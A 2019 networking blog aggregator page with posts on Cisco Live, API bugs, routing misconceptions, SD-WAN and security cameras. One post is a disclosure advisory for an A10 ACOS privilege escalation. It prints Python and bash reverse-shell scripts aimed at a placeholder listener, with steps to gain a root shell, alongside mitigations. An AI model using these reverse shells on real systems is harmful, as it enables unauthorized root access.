June 25, 2019

ipSpace.net Blog (Ivan Pepelnjak)

We Are on a Break ;)

It’s high time for another summer break (I get closer and closer to burnout every year - either I’m working too hard or I’m getting older ;).

Of course we’ll do our best to reply to support (and sales ;) requests, but it might take us a bit longer than usual. I will publish an occasional “worth reading” or “watch out” blog post, but don’t expect anything deeply technical for the next two months.

We’ll be back (hopefully refreshed and with tons of new content) in early September, starting with network automation course on September 3rd and VMware NSX workshop on September 10th.

In the meantime, try to get away from work (hint: automating stuff sometimes helps ;), turn off the Internet, and enjoy a few days in your favorite spot with your loved ones!

by Ivan Pepelnjak (noreply@blogger.com) at June 25, 2019 02:34 PM

June 24, 2019

Honest Networker

Leaking your “optimized” routes to stub networks that then leak them to a Tier 1 transit that doesn’t filter.


by ohseuch4aeji4xar at June 24, 2019 02:17 PM

ipSpace.net Blog (Ivan Pepelnjak)

First-hand Feedback: ipSpace.net Network Automation Course

Daniel Teycheney attended the Spring 2019 Building Network Automation Solutions online course and sent me this feedback after completing it (and creating some interesting real-life solutions on the way):


I spent a bit of time the other day reflecting on how much I’ve learnt from the course in terms of technical skills, and the amount I’ve learned has been great. I literally had no idea about things like Git, Jinja2, CI testing, reading YAML files, and had only briefly seen Ansible before.

I’m not an expert now, but I understand these things and have real practical experience on these subjects which has given me great confidence to push on and keep getting better.

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 24, 2019 02:14 PM

June 22, 2019

The Networking Nerd

Cisco Live 2019 – Rededicating Community

The 2019 Cisco Live Sign Photo

Another Cisco Live is in the books for me. I was a bit shocked to realize this was my 14th event in a row. I’ve been going to Cisco Live half of the time it’s been around! This year was back in San Diego, which has good and bad points. I’d like to discuss a few of them here and get the thoughts of the community.

Good: The Social Media Hub Has Been Freed! – After last year’s issues with the Social Media Hub being locked behind the World of Solutions, someone at Cisco woke up and realized that social people don’t keep the same hours as the show floor people. So, the Hub was located in a breezeway between the Sails Pavilion and the rest of the convention center. And it was great. People congregated. Couches were used. Discussions were had. And the community was able to come together again, not just during the hours when it was convenient, but all week long. This picture of the big meeting on Thursday just solidifies in my mind why the Social Media Hub has to be in a common area:

You don’t get this kind of interaction anywhere else!

Good: Community Leaders Step Forward – Not gonna lie. I feel disconnected sometimes. My job at Tech Field Day takes me away from the action. I spend more time in special sessions than I do in the social media hub. For any other place that could spell disaster. But not for Cisco Live. When the community needs a leader, someone steps forward to fill the role. This year, I was happy to see my good friend Denise Fishburne filling that role. The session above was filled with people paying rapt attention to Fish’s stories and her bringing people into the community. She’s a master at this kind of interaction. I was even proud to sit on the edge and watch her work her craft.

Fish is the d’Artagnan of the group. She may be part of the Musketeers of Social Media but Fish is undoubtedly the leader. A community should hope to have a leader that is as passionate and involved as she is, especially given her prominent role in Cisco. I feel like she can be the director of what the people in the Social Media Hub need. And I’m happy to call her my friend.

Bad: Passes Still Suck – You don’t have to do the math to figure out that $700 is bigger than $200. And that $600/night is worse than $200/night. And yet, for some reason we find ourselves in San Diego, where the Gaslamp hotels are beyond insane, wondering what exactly we’re getting with our $700 event pass. Sessions? Nope. Lunch? Well, sort of. Access to the show floor? Only when it’s open for the random times during the week. Compelling content? That’s the most subjective piece of all. And yet Cisco is still trying to tell us that the idea of a $200 social-only pass doesn’t make sense.

Fine. I get it. Cisco wants to keep the budgets for Cisco Live high. They got the Foo Fighters after all, right? They also don’t have to worry about policing the snacks and food everywhere. Or at least not ordering the lowest line items on the menu. Which means less fussing about piddly things inside the convention center. And for the next two years it’s going to work out just great in Las Vegas. Because Vegas is affordable with the right setup. People are already booking rooms at the surrounding hotels. You can stay at the Luxor or the Excalibur for nothing. But if the pass situation is still $700 (or more) in a couple of years you’re going to see a lot of people dropping out. Because….

Bad: WTF?!? San Francisco?!? – I’ve covered this before. My distaste for Moscone is documented. I thought we were going to avoid it this time around. And yet, I found out we’re going back to SF in 2022.

WHY?!?!?!?

Moscone isn’t any bigger. We didn’t magically find seating for 10,000 extra people. More importantly, the hotel situation in San Fran is worse than ever before. You seriously can’t find a good room this year for VMworld. People are paying upwards of $500/night for a non-air conditioned shoe box! And why would you do this to yourself Cisco?

Sure, it’s cheap. Your employees don’t need hotel rooms. You can truck everything up. But your cost savings come at the customer’s expense, because you would rather they pay through the nose than foot the bill yourself. And Moscone still won’t hold the whole conference. We’ll be spilled over into 8 different hotels and walking from who knows where to get to the slightly nicer shack of a convention center.

I’m not saying that Cisco Live needs to be in Vegas every year. But it’s time for Cisco to start understanding that their conference needs a real convention center. And Moscone ain’t it.

Better: Going Back to Orlando – As you can see above, I’ve edited this post to include new information about Cisco Live 2022. I have been informed by multiple people, including internal Cisco folks, that Live 2022 is going to Orlando and not SF. My original discussion about Cisco Live in SF came from other sources with no hard confirmation. I believe now it was floated as a trial balloon to see how the community would respond. Which means all my statements above still stand regarding SF. Now it just means that there’s a different date attached to it.

Orlando is a better town for conventions than SF. It’s on-par with San Diego with the benefit that hotels are way cheaper for people because of the large amount of tourism. I think it’s time that Cisco did some serious soul searching to find a new venue that isn’t in California or Florida for Cisco Live. Because if all we’re going to do is bounce back and forth between San Diego and Orlando and Vegas over and over again, maybe it’s time to just move Cisco Live to Vegas and be done with the moving.


Tom’s Take

Cisco Live is something important to me. It has been for years, especially with the community that’s been created. There’s nothing like it anywhere else. Sure, there have been some questionable decisions and changes here and there. But the community survives because it rededicates itself every year to being about the people. I wasn’t kidding when I tweeted this:

Because the real heart of the community is each and every one of the people that get on a plane and make the choice time and again to be a part of something special. That kind of dedication makes us all better in every possible way.

by networkingnerd at June 22, 2019 05:12 PM

June 21, 2019

My Etherealmind

Musing: HPE Cloudless Is A Good Marketing Joke

HPE announced a marketing campaign built around the idea of Cloudless. I see this as a superb bit of trolling, as the cloudista faithful have been delightfully duped into talking about HPE and highlighting how narrow-minded they are. Most of them don’t even realise just how hard they are being rick-rolled here. It’s bloody […]

The post Musing: HPE Cloudless Is A Good Marketing Joke appeared first on EtherealMind.

by Greg Ferro at June 21, 2019 06:48 PM

ipSpace.net Blog (Ivan Pepelnjak)

Device Configuration Synthesis with NetComplete on Software Gone Wild

When I was still at university, fourth-generation programming languages were all the hype, prompting us to make jokes along the lines of “fifth generation will implement do what I don’t know how”…

The research team in the Networked Systems Group at ETH Zurich, headed by prof. Laurent Vanbever, got pretty close. The description of their tool says:

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 21, 2019 06:30 AM

June 20, 2019

My Etherealmind

Helium – Venture Capital Con Job or Viable Business ?

The company 'Helium' appears to be attempting to build a national Low Power WAN (LPWAN) carrier network by asking normal people to buy and operate network nodes for them. The hotspots may be purchased directly or bundled with 3rd-party IoT products, and they become nodes in a proprietary LPWAN that mines tokens in a blockchain.

The post Helium – Venture Capital Con Job or Viable Business ? appeared first on EtherealMind.

by Greg Ferro at June 20, 2019 03:30 PM

Moving Packets

Cranky Old Network Engineer Complains About The Youth Of Today

If you’re very old (like me) you’ll likely remember the halcyon days when IP routing was not enabled by default on Cisco routers. Younger gamers may find this hard to believe, which makes it even stranger when I keep bumping into an apparently common misconception about how routers work. Let’s take a look at what I’m beefing about.

No IP Routing?

To put this in context for the younger gamers, it’s worth noting that at the time, a typical “enterprise” might be running IP, but was equally likely to run IPX, AppleTalk, DECnet or some other protocol which may – or may not – support routing. Yes, there was life before the Internet Protocol became ubiquitous. If you’re curious, the command to enable IP routing is, well:

ip routing

Guess how IPX routing was enabled:

ipx routing

Appletalk?

appletalk routing

DECnet Phase IV?

decnet [network-number] routing <decnet-address>

Ok, so the pattern isn’t entirely consistent, but it’s close enough. In one way things are much simpler now because routers tend to handle IP (and IPv6) and nothing else. On the other hand there are so many more IP-related features available, I think we should just be grateful that there’s only one underlying protocol to worry about.

Let’s Connect!

Assuming that a router has IP routing enabled by default, here’s my gripe. Consider this simple network topology:

[Figure: Totally High Quality Network Diagram]

The image shows a router with two connected subnets, each of which connected to a switch with a PC connected to it. The PCs each have an IP address on their respective networks, and a default gateway pointing to the router interface. I’ve used this diagram to ask a variety of simple interview questions over the last ten years or so, and as part of that I’ve asked a number of candidates to consider the scenario where PC-A cannot ping PC-B, and to describe troubleshooting steps that might be taken to determine the cause.

On a number of those occasions, a candidate has said they would check the routing table on R1. When asked to explain what they would be looking for, the candidate explains that perhaps the router didn’t have a route for one side or the other, so they’d check that it had routes. “What kind of routes?” you might ask (and I did). The candidates would then explain that there needed to be either static routing or dynamic routing on the router. Some are hesitant on the dynamic routing part, but all who go down this path explain the need for a static route to each of the attached subnets.

I really struggle to understand this. I have wondered whether it’s something inherited from the Linux world, where a netstat -rn or route shows the subnet seemingly pointing to an interface, e.g.:

$ netstat -rn
Kernel IP routing table
Destination  Gateway    Genmask         Flags  Iface
10.1.1.0     0.0.0.0    255.255.255.0   U      eth0  <---
0.0.0.0      10.1.1.1   0.0.0.0         UG     eth0

What’s interesting is that most candidates can also explain how Cisco’s administrative distance (AD) is used, and cite some common values, for example:

AD | Protocol
---+----------
 0 | Connected
 1 | Static

The candidates are typically clear that where multiple routes exist for a destination, the route with the lower AD will be selected. They’re also clear that an attached interface counts as “Connected”. The fact that a connected route would override the proposed static route doesn’t seem to register, or at least not until the conflict is pointed out, at which point it’s like their understanding of the whole world has just been turned upside down.
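
To make that selection logic concrete, here’s a minimal Python sketch (purely illustrative, not how any real router stores its table) of lowest-AD-wins route selection, where the connected route beats the proposed static route for the same prefix:

# Toy illustration of administrative distance (AD) based route selection.
AD = {"connected": 0, "static": 1, "ospf": 110}   # Cisco default AD values

# Two candidate routes for the same prefix: a proposed static route and
# the route created automatically by the attached interface.
candidates = [
    {"prefix": "10.1.1.0/24", "source": "static", "next_hop": "192.0.2.1"},
    {"prefix": "10.1.1.0/24", "source": "connected", "interface": "Gi0/0"},
]

# The route source with the lowest AD wins, so connected (0) beats static (1).
best = min(candidates, key=lambda route: AD[route["source"]])
print(best["source"])   # -> connected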

Origins of Confusion?

If this were something presented only by a very occasional candidate, I’d say it was just one of those things, but this misunderstanding has been offered up so many times over the years, I have begun to feel a little bit sorry for the candidates, because clearly somebody is out there spreading misinformation which they unfortunately have accepted in the absence of anything to contradict it.

Book Smarts

Part of this problem, I suspect, is book learning. Ask a candidate to state AD values for a list of protocols, and it’s like looking the information up in a mental table, and the answer will be rattled off with confidence. Ask how AD works or what it does, and the candidate can give a textbook definition of administrative distance on Cisco routers. This is what I can probably best define as “book smarts.” We’ve all been there; we had to learn a product or protocol without the ability at that time to be hands on, so we’ve learned all about something in theory, but have never used it in practice.

I’ve been a Grumpy Old Man about this before, and if you go to that post, jump to the heading “Rote Memorization” to get my views on it. Does Feynman’s story sound familiar? This problem is in part due to the way many vendor tests are structured, favoring trivia over actual understanding, and I can’t really blame the candidates for memorizing in this manner when that’s what will let them pass the trivia test.

Nonetheless, for the sake of my sanity, please let’s be clear that a router – with IP routing enabled – will by default route packets between its connected interfaces without help from static or dynamic routes. Yes there are some exceptions I can think of (usually revolving around same-interface routing), but in this simple scenario, this is how it is.

My 0x10 Bits

I really have wondered if there’s a CCENT-type textbook doing the rounds out there which tells the students that they need static routes for connected subnets; it seems strange that so many candidates seem to have had the same bad hallucination about how routers work. Perhaps a disgruntled student created the Free Study Guide equivalent of Monty Python’s Hungarian Phrase Book?

As for the inability to apply what has been learned, it’s possible that this is a result of a lack of practical experience and an excess of test cramming. However, unlike when I was young, optimistic and trying to learn networking, virtualized network devices are now readily available for use, so there’s little excuse for up and coming network engineers not to get some time and experience at the command line.

Or will the next generation only know how to point and click? That’s probably a topic for another rant.

If you liked this post, please do click through to the source at Cranky Old Network Engineer Complains About The Youth Of Today and give me a share/like. Thank you!

by John Herbert at June 20, 2019 01:44 PM

ipSpace.net Blog (Ivan Pepelnjak)

Impact of Controller Failures in Software-Defined Networks

Christoph Jaggi sent me this observation during one of our SD-WAN discussions:

The centralized controller is another shortcoming of SD-WAN that hasn’t been really addressed yet. In a global WAN it can and does happen that a region might be cut off due to a cut cable or an attack. Without connection to the central SD-WAN controller the part that is cut off cannot even communicate within itself as there is no control plane…

A controller (or management/provisioning) system is obviously the central point of failure in any network, but we have to go beyond that and ask a simple question: “What happens when the controller cluster fails and/or when nodes lose connectivity to the controller?”

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 20, 2019 11:08 AM

June 19, 2019

My Etherealmind

The Un Glamour of Business Travel

Originally Published in the Human Infrastructure Magazine Issue 113 in May 2019 I’m in New York, USA. I should be taking photos of myself in front of landmarks, having amazing food and laughing as I walk down the street. In reality, I’m sitting in front of a mirror that is screwed to the wall […]

The post The Un Glamour of Business Travel appeared first on EtherealMind.

by Greg Ferro at June 19, 2019 03:23 PM

ipSpace.net Blog (Ivan Pepelnjak)

Real-Life SD-WAN Experience

SD-WAN is the best thing that could have happened to networking according to some industry “thought leaders” and $vendor marketers… but it seems there might be a tiny little gap between their rosy picture and reality.

This is what I got from someone blessed with hands-on SD-WAN experience:

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 19, 2019 10:58 AM

June 18, 2019

Networking Now (Juniper Blog)

Juniper Connected Security: On Defending a Multicloud Environment

Effective information security requires gaining visibility into potential threats and preventing the spread of malicious activity when it occurs. In a multicloud environment, it is easy to lose visibility due to lack of control over the underlying infrastructure. Defending those same multicloud environments can be resource intensive, as maintaining consistent security policies across multiple infrastructures is complicated. Juniper Connected Security can help.

by Trevor_Pott at June 18, 2019 04:43 PM

Moving Packets

The Achilles Heel of the API

I’ve been developing yet more automation recently, and I’ve been hitting two major stumbling blocks that have had a negative impact on my ability to complete the tooling.

API Documentation

When APIs were first made available, the documentation from many vendors was simply incomplete; it seemed that the documentation team was always a release or two behind the people implementing the API. To fix that, a number of vendors have moved to a self-documenting API system along the lines of Swagger. The theory is that if you build an API endpoint, you’re automatically building the documentation for it at the same time, which is a super idea. This has improved the API’s endpoint coverage but in some cases has resulted in thorough documentation explaining what the endpoints are, but little to no documentation explaining why one would choose to use a particular endpoint. 

As a result, with one API in particular I have been losing my mind trying to understand which endpoint I should use to accomplish a particular task, when no fewer than three of them appear to handle the same thing. I’m then left using trial and error to find the correct path, and at the end of it I know which one to use, but not really why.

Broken APIs

There are few better ways to waste an afternoon than to have an API endpoint which you call correctly per the documentation, but the call fails for some other reason. The worst one I’ve encountered recently is an HTTP REST API call which returns an HTTP 400 error (implying that the problem is in the request I sent) but with a JSON error message in the returned content saying there was an internal error on the back end. Surely an internal server error should be in the 5xx series? That particular error is caused by a bug which prevents that API call from working correctly when the device is deployed in a cluster. This is infuriating, and it took a long time to track down and confirm as a bug rather than an error on my part.

Unfortunately this discovery also suggests that as part of the software validation process before code release, either the API is not being fully tested (it has incomplete test coverage) and/or the API is not being tested against devices which are clustered, which, for this device, I’d suggest represents the majority of implementations.

Trust But Verify

Worse, in some ways, than that are the endpoints which return a valid-looking result and a success code, but are not necessarily providing what was requested. I’ve learned the hard way that just because an API tells you that a request was successful, it’s still necessary during development to manually inspect the returned data to make sure that the API is behaving itself and providing what it claims.

For example, I am working with one API where a request for the FIB (Forwarding Information Base) returns lots of entries. However, closer inspection of those entries reveals that only the first of any ECMP next-hops is being returned; it’s not possible to see all calculated equal cost paths. As a second irritation, the entire FIB cannot be retrieved at once; after much trial and error I determined that it is necessary to page the result in blocks of around 30-35 entries, or the request eventually triggers an internal error and fails. Naturally, the documentation does not indicate that there is any kind of limit on how many FIB entries can be returned safely at one time, nor that there would be an issue with a larger FIB being returned. 

Worse, retrieving the RIB (Routing Information Base) from the same API – which thankfully does include the ECMP routes I’m looking for – only returns the first ~60 entries, and ignores any pagination requests entirely, so it’s not possible to see anything but those 60 entries. Again, looking manually allowed me to confirm that although I had asked for entries 90-129, for example, I was still getting the first 60 RIB entries. If I had not looked carefully, I could have made some very bad decisions on the basis of those incomplete data. 
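
For what it’s worth, my workaround has been to page defensively and to check that the API really honored each request. Here’s a rough Python sketch of that approach; the endpoint path, parameter names and page size are hypothetical, not any particular vendor’s API:

import requests

BASE_URL = "https://device.example.com/api"   # hypothetical device API
PAGE_SIZE = 30                                # small pages to avoid the back-end error

def fetch_fib(session):
    """Page through a hypothetical FIB endpoint, sanity-checking every response."""
    entries, offset = [], 0
    while True:
        resp = session.get(f"{BASE_URL}/fib",
                           params={"offset": offset, "count": PAGE_SIZE},
                           timeout=30)
        resp.raise_for_status()               # a 200 alone proves nothing...
        body = resp.json()
        page = body.get("entries", [])
        if not page:
            break
        # ...so verify the requested offset was honored rather than the API
        # silently returning the first page again.
        if body.get("offset", offset) != offset:
            raise RuntimeError(f"asked for offset {offset}, got {body['offset']}")
        entries.extend(page)
        offset += len(page)
    return entries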

If the “show ip route” (or similar) command didn’t work properly in the CLI of a network device, customers would lose their minds, and I am pretty certain that a patched version of code would become available almost immediately. When the API doesn’t work, I get shrugs and promises of a fix in a future release at some unspecified time.

My 2 Bits

APIs have got big and unwieldy, and that’s partly our fault as users, because – reasonably enough – we want them to allow us to do everything the device can do. The APIs take a lot more effort on the part of the vendors to document, and the end result seems to be that in some cases at least, the quality and value of that documentation has decreased even while coverage of endpoint availability and capabilities has increased. Making those APIs usable and understandable is key not just for developers but also for retaining customers, because if I can’t figure out how to do something, or I lose faith in the API’s reliability on one product, there’s a danger I’ll move to a different product.

As an industry we expect to be able to control everything via an API, and we are automating our business processes based on those APIs. Broken API endpoints mean broken business processes and that’s just not acceptable. I’m also getting a little tired of waiting for one bug to be fixed in a code release, then discovering another API bug and having to repeat the cycle, never quite finding a version of code that I can safely deploy and automate.

APIs have to be functional and reliable or they’re useless. APIs need to be thoroughly tested before code ships to customers. Perhaps vendors could consider how to patch bugs in the API in a more agile fashion, so that issues can be fixed without requiring a full code upgrade on a device, which has a high cost to the business. Unfortunately the API seems frequently to be tightly bound to the operating system rather than abstracted safely away from it, which means this will largely remain a dream rather than an actuality.

Most importantly, APIs need to be a first class citizen in the operation of every device, not a “table stakes” feature wedged uncomfortably and unreliably into legacy code.

Featured image by Charles 🇵🇭 on Unsplash

If you liked this post, please do click through to the source at The Achilles Heel of the API and give me a share/like. Thank you!

by John Herbert at June 18, 2019 01:51 PM

My Etherealmind

Why I Do Not Use Underscores in DNS, A ‘War’ Story.

My ‘do not use underscores in DNS’ war story: Back in the day when NetBIOS name services (NBNS) mattered more than DNS, people would put names on their machines so they could access the shared resources from the Windows finder. Developers and certain types of ‘security professionals’ who have opinions on underscores vs dashes […]

The post Why I Do Not Use Underscores in DNS, A ‘War’ Story. appeared first on EtherealMind.

by Greg Ferro at June 18, 2019 10:06 AM

ipSpace.net Blog (Ivan Pepelnjak)

Read Network Device Information with REST API and Store It Into a Database

One of my readers sent me this question:

How can I learn more about reading REST API information from network devices and storing the data into tables?

Long story short: it’s like learning how to drive (well) - you have to master multiple seemingly-unrelated tasks to get the job done.
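
As a starting point, the moving parts look something like this minimal sketch: pull JSON from a (hypothetical) device REST endpoint with requests and store it in a SQLite table. The URL, credentials and JSON structure are assumptions for illustration only:

import sqlite3
import requests

# Hypothetical device endpoint returning a JSON list of interfaces.
resp = requests.get("https://10.0.0.1/restapi/v1/interfaces",
                    auth=("admin", "secret"), verify=False, timeout=10)
resp.raise_for_status()
interfaces = resp.json()["interfaces"]

# Store the results in a simple SQLite table.
db = sqlite3.connect("inventory.db")
db.execute("CREATE TABLE IF NOT EXISTS interfaces "
           "(device TEXT, name TEXT, ip TEXT, status TEXT)")
db.executemany("INSERT INTO interfaces VALUES (?, ?, ?, ?)",
               [("10.0.0.1", i["name"], i.get("ip", ""), i["status"])
                for i in interfaces])
db.commit()
db.close()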

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 18, 2019 06:07 AM

June 17, 2019

ipSpace.net Blog (Ivan Pepelnjak)

How Microsoft Azure Orchestration System Crashed My Demos

One of the first things I realized when I started my Azure journey was that the Azure orchestration system is incredibly slow. For example, it takes almost 40 seconds to display six routes from a per-VNIC routing table. Imagine trying to troubleshoot a problem and having to cope with a 30-second delay on every single SHOW command. Cisco IGS/R was faster than that.

If you’re old enough you might remember working with VT100 terminals (or an equivalent) connected to 300 baud modems… where typing too fast risked getting the output out-of-sync resulting in painful screen repaints (here’s an exercise for the youngsters: how long does it take to redraw an 80x24 character screen over a 300 bps connection?). That’s exactly how I felt using Azure CLI - the slow responses I was getting were severely hampering my productivity.
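
For the youngsters who don’t want to do the math: assuming a typical async line with 10 bits per character (8 data bits plus start and stop bits), the answer is roughly a minute:

chars = 80 * 24           # characters on a full VT100 screen
bits_per_char = 10        # 8 data bits + start + stop bit on a typical async line
line_speed = 300          # bits per second

print(chars * bits_per_char / line_speed)   # 64.0 seconds to repaint the screen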

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 17, 2019 07:04 AM

June 14, 2019

My Etherealmind

Why Cisco is Not A Networking Company Anymore

I wanted to put down some evidence on why Cisco is more than a networking company.

I consider this useful information for people who are planning their careers, and particularly those people who are investing in certification programs. It’s my view that Cisco has outgrown networking.

The post Why Cisco is Not A Networking Company Anymore appeared first on EtherealMind.

by Greg Ferro at June 14, 2019 12:09 PM

Potaroo blog

Looking for What's Not There

DNSSEC is often viewed as a solution looking for a problem. It seems only logical that there is some intrinsic value in being able to explicitly verify the veracity and currency of responses received from DNS queries, yet fleshing this proposition out with practical examples has proved challenging. Where else might DNSSEC be useful?

June 14, 2019 06:00 AM

ipSpace.net Blog (Ivan Pepelnjak)

Feedback: Ansible for Networking Engineers

I always love to hear from networking engineers who managed to start their network automation journey. Here’s what one of them wrote after watching the Ansible for Networking Engineers webinar (part of the paid ipSpace.net subscription, also available as an online course).

This webinar helped me a lot in understanding Ansible and the benefits we can gain. It is a big area to grasp for a non-coder and this webinar was exactly what I needed to get started (in a lab), including a lot of tips and tricks and how to think. It was more fun than I expected, so I started with Python just to get a better grasp of programming and Jinja.

In early 2019 we made the webinar even better with a series of live sessions covering new features added to recent Ansible releases, from core features (loops) to networking plugins and new declarative intent modules.

by Ivan Pepelnjak (noreply@blogger.com) at June 14, 2019 05:59 AM

June 13, 2019

Moving Packets

A10 Networks ACOS Root Privilege Escalation

The following summarizes a root privilege escalation vulnerability that I identified in A10 ACOS ADC software. This was disclosed to A10 Networks in June 2016 and mitigations have been put in place to limit exposure to the vulnerability.

SUMMARY OF VULNERABILITY

Any user assigned sufficient privilege to upload an external health monitor (i.e. a script) and reference it from a health monitor can gain root shell access to ACOS.

At this point, I respectfully acknowledge Raymond Chen’s wise words about being on the other side of an airtight hatch; if the malicious user is already a system administrator or has broad permissions, then one could argue that they could already do huge damage to the ADC in other ways. However, root access could allow that user to install persistent backdoors or monitoring threats in the underlying OS where other users can neither see nor access them. It could also allow a partition-level administrator to escalate effectively to a global admin, by way of being able to see the files in every partition on the ADC.

SOFTWARE VERSIONS TESTED:

This vulnerability was originally discovered and validated in ACOS 2.7.2-P4-SP2 and is present in 4.x as well.

VULNERABLE VERSIONS

This behavior has been core to external health monitor scripts, so it can be reasonably stated that this vulnerability exists in:

  • ACOS 2.7.2 initial release and tested up to 2.7.2-P14 inclusive
  • ACOS 4.0 initial release up to 4.1.4-GR1-P1 inclusive

WORKAROUNDS

2.7.2: Use Role Based Access Control to map users to a Role which does not include External Health Monitor privileges.
4.1.1-P10 onwards: Ensure that administrators do not have the new “HM” privilege unless absolutely necessary.

FIXED IN

The underlying vulnerability for this privilege escalation has not been fixed, so a user with health monitor rights can still gain a root shell as of 2.7.2-P14 and 4.1.4-GR1-P1.

However, the following mitigations were put in place as of v4.1.1-P10:

  • External HM privileges have been removed from the default ReadWriteAdmin role;
  • A new “ReadWriteHM” privilege has been created, which is effectively one level above ReadWrite privilege, and allows administration of External HMs;
  • External HM privilege can no longer be granted to Partition admins, only to global admins.

[Figure: External Health Monitor privilege, as shown in the release notes]

Ideally the health monitors would not be running as root and it would perhaps be wise to run them in a chrooted environment. However, given the extent of code rewriting that this would incur, and the fact that this is an admin privilege escalation rather than a guest->root escalation, I believe that these changes are appropriate and see them as good steps to protect against nefarious administrators.

AUTHOR / DISCOVERER

John Herbert (http://movingpackets.net)

Vulnerability Details

Custom health monitors can be created in ACOS in the form of “external health monitors”, i.e. scripts that are uploaded by the user to perform a non-standard health check and return an up or down status by way of exit code. Supported languages for such health checks include Bourne Shell, BASH and Python 2.7. Scripts can be uploaded by users who have been granted the appropriate configuration-level permissions (including users whose write permissions are limited to their own partition), after which the script can be used as the health check method within a health monitor configuration.

Unfortunately, uploaded scripts are stored and executed with uid/gid 0 (root), so it is trivial to trigger a reverse shell to a listening system which will have root privilege on the A10 load balancer.

Exploitation

Exploiting this vulnerability is simple. First, create a simple “reverse shell” script. Examples are given here in bash and in python, in both cases triggered from within a bash script:

Python:

#!/bin/bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LISTENER_IP>",<LISTENER_PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &
exit 0

BASH:

#!/bin/bash
bash -i >& /dev/tcp/<LISTENER_IP>/<LISTENER_PORT> 0>&1 &
exit 0

Both of the examples above will trigger a backgrounded process that will initiate a TCP connection to <LISTENER_IP> on port <LISTENER_PORT>. To put this into effect, follow these simple steps:

  1. Create an external health monitor on the A10, and populate it with one of the scripts above.
  2. Create a health monitor that references the external health monitor script. It is necessary to have sufficient privilege – at a minimum within a partition – to upload the script and create a health monitor, so this is definitely a privilege escalation rather than a full external hack.
  3. Set up a listener on a device accessible to the ACOS management port. In this case, using netcat: nc -l 5555
  4. Trigger the script.

Triggering the script can be done in one of two ways, depending on the platform:

Apply the Health Monitor to an object

Both 2.7.x and 4.x code allows a health monitor to be applied to an object. At its simplest, create a server object and use the new health monitor:

slb server innocent_looking_server 1.2.3.4
health monitor root_shell_hm
!

Test the Health Monitor (2.7.x only)

ACOS v2.7.x offers a way to manually test a health monitor against a server. The destination IP to test does not matter, as our health monitor isn’t going to be trying to contact it. In the CLI:

health-test 1.2.3.4 monitorname root_shell_hm

Once the HM has been applied to an object or the test has been manually triggered, the A10 should establish a connection back to the target machine on the specified port. The netcat listener should now look something like this:

$nc -l 5555
sh: no job control in this shell
sh-4.2#

Now to validate that we have root:

sh-4.2#id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#

Observations Regarding Impact

It is already possible (with a few intermediate steps) to mount a vThunder (a virtual A10 ADC) disk image in linux and freely browse the content, so the information within the A10 OS is arguably already exposed and editable in offline circumstances; but then, who has disk images from their production A10 systems lying around? That notwithstanding, this privilege escalation allows root access to a live production system, and could also allow a partition admin to view configuration data from partitions which the attacker is not entitled to access.

Recommendation

  • Only grant external health monitor (EHM) access to administrators when absolutely needed, using Roles (v2.7.2) or the new ReadWriteHM privilege (v4.1.1-P10 onwards)
  • Audit external health monitor scripts periodically
  • ACOS 4.1 users running ACOS 4.1.1-P9 or earlier should upgrade to 4.1.1-P10 or later

If you liked this post, please do click through to the source at A10 Networks ACOS Root Privilege Escalation and give me a share/like. Thank you!

by John Herbert at June 13, 2019 07:50 AM

ipSpace.net Blog (Ivan Pepelnjak)

Running OSPF in a Single Non-Backbone Area

One of my subscribers sent me an interesting puzzle:

One of my colleagues configured a single-area OSPF process in a customer VRF, but instead of using area 0, he used area 123 nssa. Obviously it works, but I was thinking: “What the heck, a single OSPF area MUST be in Area 0”…

Not really. OSPF behaves identically within an area (modulo stub/NSSA behavior) regardless of the area number…

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 13, 2019 05:42 AM

June 12, 2019

ShortestPathFirst

Interview with Katherine Dollar, Creative Marketing Storyteller and Communications Strategist

In this interview, I sit down with Katherine Dollar, a brilliant Creative Marketing Storyteller and Communications Strategist at Moxie Blue Media. We discuss the role of storytelling in marketing campaigns and speaking engagements and why this method of relaying information resonates in a way that creates a better connection with the audience and further helps …

by Stefan Fouant at June 12, 2019 07:02 PM

Moving Packets

Meraki In The Middle – Smart Security Cameras

I’ve been looking at security cameras recently, in part because my homeowners association needs to upgrade the system which monitors some of the amenities. We want motion detection features and, obviously, remote access to view live cameras and recorded footage without having to go to the location. Unfortunately there’s a gap in the market which seems to be exactly where I’m looking. Cisco Meraki may have just stepped in and bridged that gap.

The Problem Space

Low-End Products

Over the last few years, a wide variety of small security cameras have become available, any of which at first glance would appear suitable. These include products like Netgear’s Arlo, Amazon’s Blink, Google’s Nest Cam and more. After some brief testing, however, I’m a little less convinced that they are what we’re looking for. It sounds silly to say it, because it’s not like this is something they hide, but these products are all aimed at the home user market. Dashboard logins are single user, based on an email address, and the web interfaces may not work well for much more than five or so cameras. The camera choices are fairly limited, and as they’ll be streaming their feeds over WiFi to the cloud, it’ll be important to have good, fast wireless coverage and enough internet bandwidth to sustain all the streams in parallel, something which scales progressively less well as the number of cameras increases. On the up side, all of the solutions have a mobile app available.

High-End Products

Commercial camera offerings, in contrast, tend to revolve around a vast range of expensive cameras which are hard wired (usually to the network, as IP cameras are the most common option now). The recorded footage is stored on an on-premises Digital Video Recorder (DVR) and there will be a desktop application available to access it.

Meraki In The Middle

Somewhere in the middle of the products above we find Meraki, who is selling what appear to be some really neat security cameras. From what I can see, the Meraki cameras in fact lean towards the high end in terms of quality, but Meraki has brought with it the same underlying cloud-managed simplicity with which it has approached wireless, switching and security. To be clear, Meraki has been selling its “MV” security cameras for a while, but with the second generation models it has significantly upped its game, and it is these cameras I am discussing. The second generation cameras have model numbers which end in the number two (2), e.g. MV-32.

How is Meraki Different?

Local Storage

